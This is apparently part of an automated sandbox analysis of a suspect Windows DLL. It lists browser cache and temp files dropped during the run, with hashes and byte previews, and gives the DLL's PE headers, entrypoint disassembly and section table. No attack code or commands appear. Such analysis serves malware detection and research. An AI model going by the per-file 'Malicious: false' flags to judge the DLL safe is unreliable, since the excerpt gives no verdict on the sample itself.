SHA-256:	9EAE34123D01CDEE3C947383FB0B3DFFF0BBA0A4F6AA8FB239EACD3307380C01
SHA-512:	250759ACE1853CED9F41485EABD34B0914F820B507C4202B1131FBF6C4EADA167216C1D049A6517B1CB56E277BA96CBDF4339A03C96BF2AB843F16A0E0FEB198
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..3...Q@....@...(.(...1....h..Q@Xz.AH..PP...0.....P!.)....d..l........z.&%...(.......l&(....aq@..)...b...h...0....hM...E......C..F.L...(.1@XB(%.'RMR3.[#1.aN.:li.......R..K.~.]..H<......=..._.....y/...t..E...... .@......(...a1@.&(....b..P.....h..1@...J...!.P!1@...@.....%.&.I.P!E....Z.- .............m.,..V...a(.;...kA..LP+.(.....L...cq.2C....@..0.9.D.6.....@..C..v.......C........X..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAycUpK[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	279
Entropy (8bit):	6.585816958592039
Encrypted:	false
SSDEEP:	6:6v/lhPahm1TutaSP91hccpL3fHL5FlzNua5GVp:6v/7XSxFQcZ3f9rUa07
MD5:	D63AE2349294868B3EC2658627995955
SHA1:	E96A4ECB7E48AAC4355BDC28F12DA4C334AD2E20
SHA-256:	12D743416FD1041E0D34C45732DD577A39CD218B65E3F39BF43F2277EE7E6553
SHA-512:	4885F0BA41A6B9E0B14F588B6451C83B08ED2094247EE2160EAD9FB79D9A6474B7EF4DFFCA468845BD9DB27A66231833A9F94E62961975C55B12F3ACB9399C1A
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx.c....?......`...k.?3.]..W..w..g..b.z.(..^...d...BQ..8.....?..(..lo.....E.........\|.,. .\....gb.=..Ze0..A.....s...`M....ZW\|.`@1..J..x.(.:...\|....y...XH,..*....&-.a...8.B.8..A......S.Mn.....d30Y.Uw....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1aXBV1[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1161
Entropy (8bit):	7.80841974432226
Encrypted:	false
SSDEEP:	24:zxxmempCXfPZq+DLeP1cRwZFIjvh3wuiFZMrFYzWkG4iD3w:zxRBXfB9k1cRuFIbJWsFYT/2w
MD5:	D858BE67BEA11BF5CEC1B2A6C1C1F395
SHA1:	6090B195BEF6AF1157654048EECEA81E2DCEC42A
SHA-256:	FC7CF2E8592C8E63CFF72530DA560E3293EC2DE3732823DBAEB4464609EA0494
SHA-512:	180FA05957A2FCF8192006D5F8E8D3E4DE1D79DD6F9F100D254C513068FC291B3086DE9A8897B3658D83FE3335FDEB4023F13AC3A6A8A507729AE22B621EC7D7
Malicious:	false
Preview:	.PNG........IHDR................U....pHYs..........+.....;IDATx...}..c.....j...2..Y.l....i.<4.c...)..p...M..(4b.Z.r...."cDe..Bz..sw.g.9.....^..u}?....n[he.{..,u.....`.>.[.iE...[.1B.Tx..X.7......0.[.....5.)p...x...d\...g..........WmE1.sl......u....3K.[......;...........f....W(.E3//6...2tG..AU...`7f.m. r;..r..{.~.X./.Q._..`.C...D.M.n.p%..U...0...HTe..1......7.@.Tn.r......C.k.../[..j.X..:.+Q.3.y.4. ,E....g.Y...p^..c..:..#/...iES....E.w..op.... .9.W........).+.1....A~.\...{...q.El..`.&;...o.&q:.K....\|.....e.(..."9.z\.~.....G.h...\.'.;... G........J....P.gy..<BeK.I..<..d..MF".O.uE...R..-...{..J...F..*.a..lj...t\.W.....&.l\|?...WvP...._o.c.....8..10;.q-"8L.2..~,....~V..\|]..c..\.'...I.....u8.......Q.3..lB."..!LD.bs.K[..)0P0.9..'....K...W..g..,f.........S......S..)N..D;.....<.....7#..X2.ws.....H.vF'...,$l..R4.O/.~..j.'&..6.........!.D.m..].G........W#.Uir..sT..m....h...UN.._V#..S.6.....i..M....[..?.J.....OL\..Q<{.G.n5).Ix.....<+7Ey.....W.].NR.o...._.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1cEP3G[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1088
Entropy (8bit):	7.81915680849984
Encrypted:	false
SSDEEP:	24:FCGPRm4XxHvhNBb6W3bc763IU6+peaq90IUkiRPfoc:/pXBvkW3bc7k1FqWIUkSfB
MD5:	24F1589A12D948B741C2E5A0C4F19C2A
SHA1:	DC9BB00C5D063F25216CDABB77F5F01EA9F88325
SHA-256:	619910A3140A45391D7D3CB50EC4B48F0B0C8A76DC029576127648C4BD4B128C
SHA-512:	5D7A17B05E1FD1BC02823EC2719D30BC27A9FA03BCFFE30F3419990E440845842F18797C9071C037417776641AB2CDB86F1F6CD790D70481B3F863451D3249EE
Malicious:	false
Preview:	.PNG........IHDR................U....pHYs..........+......IDATx...]..U.....d..6YwW(.UV\.v.>.>..`.K}X).i..Tj...C..RD. ..AEXP.............]).vQ../$.%.l2.....dH&.YiOr93.....~..u.S...5........J.&..;.JN..z....2..;q.4..I .....c!....2;J........l(......?.m+......V...g3.0..............C..GB.$..M.....jl.M..~6?.........../a%...;....E.by.J..1.$...".&.DX..W..jh.....=...aK...[.#....].. ....:Q....X.........uk.6.0...e7..RZ..@@H..k........#......[..C.-.AbC.fK.(a.<.^p.j`...._>{<....`.........%.L...q.G...).2oc{....vQ...N5..%m-ky19..F.S....&..../..F......y.(.8.1..>?Zr......Q.`.e.\|0.&m.E....=[aN..r.+....2B/f8.v..n...N..=........i.^....s&..Hr.z.....M......:........EF.....0.. .N.x............N.pO.#2...df=...Fa..B#2yU....O.;.g....b.}ct.&.7x..t.Y..yg....]..){.,.v.F.e.ZF.z..Ur+..^..].#.]....~..}..{g.W0?....&....6n....p\.=.]..X...F.]...\s5OK.3Wb.#.M/fT...:^.M}...:t.......!..g......0t.h..8..4cB....px..............1.!...}=...Qb$W.*..."............V....!.y......<H

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1cG73h[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1131
Entropy (8bit):	7.767634475904567
Encrypted:	false
SSDEEP:	24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
MD5:	D1495662336B0F1575134D32AF5D670A
SHA1:	EF841C80BB68056D4EF872C3815B33F147CA31A8
SHA-256:	8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
SHA-512:	964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
Malicious:	false
Preview:	.PNG........IHDR................U....pHYs..........+......IDATx..U=l.E.~3;w{..#].Dg!.SD...p...E....PEJ.......B4.RE. :h..B.0.-$.D"Q 8.(.;.r.{3...d...G......7o..9....vQ.+...Q......."!#I......x\|...\...& .T6..~......Mr.d.....K..&..}.m.c.....`.`....AAA..,.F.?.v..Zk;...G...r7!..z......^K...z.........y...._..E..S....!$...0...u.-.Yp...@;;;%BQa.j..A.<)..k..N.....9.?..]t.Y.`....o....[.~~..u.sX.L..tN..m1...u...........Ic....,7..(..&...t.Ka.]..,.T..g.."...W......q....:+t.?6....A..}...3h.BM/.......<.~..A.`m...:.....H...7.....{.....$... AL..^-...?5FA7'q..8jue........?A...v..0...aS.:.0.%.%"......[.=a......X..j..<725.C..@.\. ..`.._....'...=....+.Sz.{......JK.A...C\|{.\|r.$.=Y.#5.K6.!........d.G...{......$.-D.z..{...@.!d.e...&..o...$Y...v.1.....w..(U...iyWg.$...\>..].N...L.n=.[.....QeVe..&h...`;=.w.e9..}a=.......(.A&..#.jM~4.1.sH.%...h...Z2".........RP....&.3................a..&.I...y.m...XJK..'...a......!.d.......Tf.yLo8.+.+...KcZ.....\|K..T....vd....cH.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1kc8s[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.702979580339968
Encrypted:	false
SSDEEP:	24:5yrGVrpvzYKWJzgT7w2CGZi1/BwIBCHL/P:srG1pLYPJzY7w/G4OIKLH
MD5:	CD8DFD7D16B4BA3E2873EE06DB780B06
SHA1:	E8A79F0671D287E116C76FAA5F0E8A4099E0BD23
SHA-256:	88E6642487D0F944C6A020133CAE030781CFDCB518802419F10AD78937BDA6DF
SHA-512:	199AA29EF33317A43D1C6DF434DD5F9D0FF54BF363CCB1948A970C7EC6889B083565E85E0A140FCDFC38B675CA3EB24DEA0659897EF0450CEF43444E1CEFDA8B
Malicious:	false
Preview:	.PNG........IHDR.............;0......pHYs..........+...../IDATx..]H.Q......LG.LW..Ha..:?.f_l...l.a..........z.a.e.=)....D...'c.E_...F.&).\...4....x...:...=..g.?.....>...'......b......I=..Z...V.o.....O........i4............9qjpWWW.P(\|.TM....}@0 ......Es .x...}.n..J.?....C(...V.UY[[.`........R.v..wvv........g.....v...H.....x......4.0..b.\v:.v\kN^'.`.....gb..y....FX,.y.J..............~.s..x<?.+...l6qYY..hT...A^^.....#.H....q}.^..r.o....WWW?....S.)...D..)..Qz.`0..f..T.t.VVV`ss.0:PQQ.MMM....p8...........`......H..#'=......o.H$.......L&.,?..x.....(%.....c}.0DPPP@.3........t....=Xb.r.`aa......dr.E..u....6,.j-c;11......p8..(.LJ.d2..n..BaL...(..6.-...e..Z?.<...M...5hmm...\|..................`4.qjj....d$..CsQtLUUU.%.....N....Wn~~.:...=.........(===..$Z.......h4....$.c.q.LM...xgffl...r.O.........}....(.Y.{{{.+.2.M..8.P..89"g6...B.l..Z.....o.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB7gRE[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	501
Entropy (8bit):	7.3374462687222906
Encrypted:	false
SSDEEP:	12:6v/71zYhg8gNX8GA3PhV8xJy4eOsEfOZbLjz:u8O9A/hSJ9lfkbb
MD5:	1FCA95AEED29D3219D0A53A78A041312
SHA1:	5A4661CCF1E9F6581F71FC429E599D81B8895297
SHA-256:	4B0F37A05AB882DA679792D483B105FDD820639C390FC7636676424ECFD418B9
SHA-512:	7E02CEB4A6F91B2D718712E37255F54DA180FA83008E0CE37080DADFE8B4D0D50BC0EA8657B87003D9BAD10FA5581DBB8C1C64D267B6C435DA48CBED3366CDEA
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx..RKN.A.}... ...e1(."le.....F\...@.."...\|... ..ld.$.(.`..V.0].ghK....]SS...J.I.<@.O.{..........:WB8~....}Hr...P.....`l.N...N.....Z...'.3..;....3.B-....i...L........b..{... ..Q.... ........L...=.d....n.....&.!..O....W1..."....gm5x....[.C.9^Q.BC.....O...../.(...\|.~.0hv..S..7.....YBn..B..o.T<.........\|.g&....U.....gm.. .....U..,.u..)\$.lN.w]Rm.......OZ.h.......zn.~...A.uy........,..........3(..........z<....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB7hjL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	462
Entropy (8bit):	7.383043820684393
Encrypted:	false
SSDEEP:	12:6v/7FMgL0KPV1ALxcVgmgMEBXu/+vVIIMhZkdjWu+7cW1T4:kMgoyocsOmIZIl+7cW1T4
MD5:	F810C713C84F79DBB3D6E12EDBCD1A32
SHA1:	09B30AB856BFFDB6AABE09072AEF1F6663BA4B86
SHA-256:	6E3B6C6646587CC2338801B3E3512F0C293DFF2F9540181A02C6A5C3FE1525A2
SHA-512:	236A88BD05EAF210F0B61F2684C08651529C47AA7DCBCD3575B067BEDCA1FBEE72E260441B4EAD45ABE32354167F98521601EA21DDF014FF09113EC4C0D9D798
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx...N.P...C.l...)...Mcb*qaC/..]..7..l...x.Z......w......._....<....\|.........."FX.3.v.A.............1..Rt...}......;....BT.....(X.....(....4...-...f....0.8...\|A.:P%.P..if.t..P..T.6..)s..H..~.C..(.7.s>....~...h..bz...Z.....D4Vm.T...2.5.U.P....q.6..1t~.ZU....7.i...".b.i.~...G.A!..&..+S.(<(...y._w..q........Q.l..1...Tz...Q...r.............g...+.o.]...J...$.8:.F..I.......XT..k.v....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBPfCZL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 50 x 50
Category:	dropped
Size (bytes):	2313
Entropy (8bit):	7.594679301225926
Encrypted:	false
SSDEEP:	48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
MD5:	59DAB7927838DE6A39856EED1495701B
SHA1:	A80734C857BFF8FF159C1879A041C6EA2329A1FA
SHA-256:	544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
SHA-512:	7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
Malicious:	false
Preview:	GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,\|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../\|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..\|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(\|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....TP......>...L..!T.X!.(..@a..IsgM..\|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBX2afX[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	879
Entropy (8bit):	7.684764008510229
Encrypted:	false
SSDEEP:	24:nbwTOG/D9S9kmVgvOc0WL9P9juX7wlA3lrvfFRNa:bwTOk5S96vBB1jGwO3lzfxa
MD5:	4AAAEC9CA6F651BE6C54B005E92EA928
SHA1:	7296EC91AC01A8C127CD5B032A26BBC0B64E1451
SHA-256:	90396DF05C94DD44E772B064FF77BC1E27B5025AB9C21CE748A717380D4620DD
SHA-512:	09E0DE84657F2E520645C6BE20452C1779F6B492F67F88ABC7AB062D563C060AE51FC1E99579184C274AC3805214B6061AEC1730F72A6445AEBDB7E9F255755F
Malicious:	false
Preview:	.PNG........IHDR................U....pHYs..........+.....!IDATx...K.Q..wfv.u......,I"...)...z............>.OVObQ......d?\|.....F.QI$....qf.s.....">y`......{~.6.Z.`.D[&.cV`..-8i...J.S.N..xf.6@.v.(E..S.....&...T...?.X)${.....s.l."V..r...PJ!..p.4b}.=2...[......:.....LW3...A.eB.;...2...~...s_z.x\|..o....+..x....KW.G2..9.....<.\....gv...n..1..0...1}....Ht_A.x...D..5.H.......W..$_\G.e;./.1R+v....j.6v........z.k............&..(....,F.u8^..v...d-.j?.w..;..O.<9$..A..f.k.Kq9..N..p.rP2K.0.).X.4..Uh[..8..h....O..V.%.f.......G..U.m.6$......X....../.=....f:.......\|c(,.......l.\..<./..6...!...z(......# "S..f.Q.N=.0VQ._..\|....>@....P.7T.$./)s....Wy..8..xV......D....8r."b@....:.E.E......._(....4w....Ir..e-5..zjg...e?./...\|X..."!..'/......OI..J"I.MP....#...G.Vc..E..m.....wS.&.K<...Kq..\...A..$.K......,...[..D...8.?..)..3....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\de-ch[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	425305
Entropy (8bit):	5.439145139597471
Encrypted:	false
SSDEEP:	3072:Zf0JUoxx+fAkJ8ZRGDQZXhOxxsnsMEEEPgWiHl8gk5fCE61Vxf7hLZ:Zf0fOfGnvEEEPgpHrk5fCEa/7j
MD5:	1C4404E333B78964F2E69C848C58CAA6
SHA1:	C3B8B735EF165AAEAD450BA35D7B62670B3E6715
SHA-256:	838072701D0F5B0DFB1E49B672BF0D60F38EFBDB56F086CA614EC3379E7199A8
SHA-512:	AF8E160FEB8D928480246DE4C41C1757E529D4DAA9EA574BEC5749E1D958CBFFF8DA952F58267F23C8DDC80F7E5B42FA274709DD2345EB70425B615D7D313053
Malicious:	false
Preview:	<!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20211114_25718401;a:89e9c689-e4e4-42bc-8dec-c0870f35ae96;cn:41;az:{did:2be360ae5c6345da911d978376c0449f, rid: 41, sn: neurope-prod-hp, dt: 2021-11-22T07:12:11.7572457Z, bt: 2021-11-14T01:17:13.2620239Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-08-11 10:21:32Z;xdmap:2021-11-22 13:27:09Z;axd:;f:msnallexpusers,muidflt14cf,muidflt298cf,mmxandroid1cf,pneedge3cf,audexedge2cf,bingcollabedge2cf,pnehp1cf,platagyhp2cf,moneyhp2cf,bingcollabhz1cf,artgly3cf,article5cf,onetrustpoplive,anaheim1cf,msnapp2cf,1s-bing-news,vebudumu04302020,bbh20200521msn,msnsapphire2cf,6bc60644,1s-br30min,btrecrow1,1s-winauthservice,1s-winsegservice,wf-sunny-first,msnapp7cf,msnapp8cf,prong2c,1s-maps-latlongkeyc,1s-pagesegservice,routentpring2c,wf-ba

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\e151e5[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	dropped
Size (bytes):	43
Entropy (8bit):	3.122191481864228
Encrypted:	false
SSDEEP:	3:CUTxls/1h/:7lU/
MD5:	F8614595FBA50D96389708A4135776E4
SHA1:	D456164972B508172CEE9D1CC06D1EA35CA15C21
SHA-256:	7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
SHA-512:	299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
Malicious:	false
Preview:	GIF89a.............!.......,...........D..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\jquery-2.1.1.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	84249
Entropy (8bit):	5.369991369254365
Encrypted:	false
SSDEEP:	1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
MD5:	9A094379D98C6458D480AD5A51C4AA27
SHA1:	3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
SHA-256:	B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
SHA-512:	4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
Malicious:	false
Preview:	/! jQuery v2.1.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct

C:\Users\user\AppData\Local\Temp\~DFA1E2BE88D585CFB5.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08130141603165993
Encrypted:	false
SSDEEP:	3:zdo5exlVF8GV6t/6/lclllv/nt+lybltll1lRslkhlEkll5XMGHKJMM:u8xP2C6tGUFAlkxyG1M
MD5:	73EA0BBCA7574AFCF921FC68E5EF3240
SHA1:	C5CFD81CA0E130E4A7A4A1D523ACC084C7798EE3
SHA-256:	83601ADA63FB127B67214D69AAD04945F5A2DE7C491F7CA84FAA9E55EB52C060
SHA-512:	B9396DDB74EF654C1C3DBE617CC0C4DC4B94DFE5A99602D3055E13D2BF989F937AD4F5A83917F868DC6390E25A4E941D1FF1B2783EF4B97711BB21E8D9437CD1
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFBB4D173838662490.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	176128
Entropy (8bit):	3.29216369931454
Encrypted:	false
SSDEEP:	3072:rZ/2Bfcdmu5kgTzGtnZ/2Bfc+mu5kgTzGt:y4
MD5:	97C7D59D61BF8B43CDA720B2F3A435C9
SHA1:	84CD40B1E0E53D0906F16163C4AE47CA83F2B72A
SHA-256:	21F729667C6157158D1E0D963021EE7425F28F97339BC9151FBEE6ADE694648A
SHA-512:	442E067C5A36291E7492DC16F4E45C67A0E453D6E9BF8D46761D789DC4299F5903B9175D257D978E15E4AA25FC4EA53199554E271DBA68BC3A97673E82B0338F
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.736841739951072
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Clipper DOS Executable (2020/12) 0.20% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2zTgaLRFkL.dll
File size:	136192
MD5:	096d27e730a16660704e6713fdc89173
SHA1:	880a73f218d5b4ba3f734c14ed3b84ef036aa85a
SHA256:	5bbba6d13c8222ef2cc5c4aecf14043f1e74d164ab2a1b3e4b68ee6cb086900c
SHA512:	295a9eff04f9a69286dda01364dd32c76585eaf18e09e2a7a57481f9f3bbb1a428b9dadc4a5c5034c60a2b18ac90d036cd7bfc31ec64965cc0cbc5c00d382b66
SSDEEP:	3072:wonUFuZWnUWaCezzbqMlJuIqf59+fbbAxSdk6Atue:woU/U3zXdx+eaL7t/
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................................................................................................................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10002b61
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x619A4C0F [Sun Nov 21 13:39:27 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	4c89e39b5ebc619c69b957c6b4f65780

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FB72CE0E147h
call 00007FB72CE0E2C9h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FB72CE0DFF3h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push 00000000h
call dword ptr [1000D00Ch]
push dword ptr [ebp+08h]
call dword ptr [1000D008h]
push C0000409h
call dword ptr [1000D010h]
push eax
call dword ptr [1000D014h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [1000D018h]
test eax, eax
je 00007FB72CE0E147h
push 00000002h
pop ecx
int 29h
mov dword ptr [10021978h], eax
mov dword ptr [10021974h], ecx
mov dword ptr [10021970h], edx
mov dword ptr [1002196Ch], ebx
mov dword ptr [10021968h], esi
mov dword ptr [10021964h], edi
mov word ptr [10021990h], ss
mov word ptr [10021984h], cs
mov word ptr [10021960h], ds
mov word ptr [1002195Ch], es
mov word ptr [10021958h], fs
mov word ptr [10021954h], gs
pushfd
pop dword ptr [10021988h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [1002197Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00021980h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1fe40	0x8e8	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x20728	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x23000	0xf8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24000	0xdb0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1f6b0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1f6e8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xd000	0x104	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb748	0xb800	False	0.604853091033	data	6.60960432653	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xd000	0x13d02	0x13e00	False	0.679318985849	Applesoft BASIC program data, first line number 2	6.22213777784	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x21000	0x13a8	0xa00	False	0.137109375	data	1.83938352827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
